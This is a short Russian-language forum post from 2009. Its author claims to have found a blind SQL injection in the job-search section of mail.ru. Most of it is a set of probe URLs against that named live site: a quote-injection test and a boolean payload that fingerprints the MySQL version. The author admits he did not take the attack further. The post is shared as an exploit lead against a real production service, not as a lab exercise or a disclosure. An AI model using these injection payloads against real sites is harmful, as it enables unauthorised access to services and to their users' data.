26.02.2009, 21:05
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
баг на mail.ru
Вот нашол SQL injection на mail.ru
Crekm слепая, без вывода...
внимательно смотрим на формировку наги:
Код:
http://rabota.mail.ru/vac_search/?go=1&from_search=1&query=
Код:
http://rabota.mail.ru/vac_search/?go=1'&from_search=1&query=
смотрим версию мускула:
Код:
http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=
пятая...
вроди как возможно внедрение SQL кода...
Дальше не докрутил, ибо не силён в подзапросах... |
|
|